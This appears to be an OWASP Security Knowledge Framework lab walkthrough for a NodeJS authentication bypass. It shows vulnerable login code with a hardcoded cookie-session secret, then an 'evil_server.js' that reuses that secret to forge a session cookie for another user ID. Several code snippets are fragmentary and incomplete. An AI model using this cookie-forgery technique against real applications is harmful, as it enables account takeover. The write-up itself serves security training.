NodeJS - Auth Bypass

Running the app on Docker

$ sudo docker pull blabla1337/owasp-skf-lab:js-auth-bypass
$ sudo docker run -ti -p blabla1337/owasp-skf-lab:js-auth-bypass
Now that the app is running let's go hacking!


Let's login with admin/admin.
Once we login we see an API key.
Let's have a look at the source code:
app.all("/login", (req, res) => {
const sql = "SELECT * FROM users WHERE username = ? AND password = ?";
const api = "SELECT * FROM preferences WHERE UserId = ?";
if (req.method === "POST") {
db.get(sql, [req.body.username, req.body.password], (err, row) => {
if (row) {
req.session.userId = row.UserId;
req.session.secret = "e5ac-4ebf-03e5-9e29-a3f562e10b22";
req.session.loggedIn = true;
db.get(api, [req.session.userId], (err, row) => {
res.render("home.ejs", { api: row.API_key });
} else {
} else {
db.get(api, [req.session.userId], (err, row) => {
res.render("home.ejs", { api: row.API_key });
We can see the cookie session secret is exposed, now we can try to recreate this application cookie implementation to be able to recreate a cookie to bypass the authentication.


We can start building our malicious server.
const cookieSession = require("cookie-session");
const express = require("express");
const cookieParser = require("cookie-parser");
const app = express();
name: "session",
keys: ["e5ac-4ebf-03e5-9e29-a3f562e10b22"],
httpOnly: false,
maxAge: 86400000,
app.get("", (req, res) => {
req.session.userId = 2; // CHANGED THE USER ID
req.session.secret = "e5ac-4ebf-03e5-9e29-a3f562e10b22";
req.session.loggedIn = true;
const port = process.env.PORT || 1337;
app.listen(port, "", () =>
console.log(`Listening on port ${port}...!!!`)
Save the snippet above to > evil_server.js and run the commands below to install some dependencies. Of course you can also run your app on whatever service you want it does not have to be nodeJs express.
$ npm install express ejs cookie-session cookie-parser
Save the following snippet code into /views/evil.js
<p>The newly created cookie for doing the bypass:</p>
We are ready to start our server:
$ node evil_server.js
Now we can replace our original cookie with the tampered cookie.
Refresh the page:

Additional sources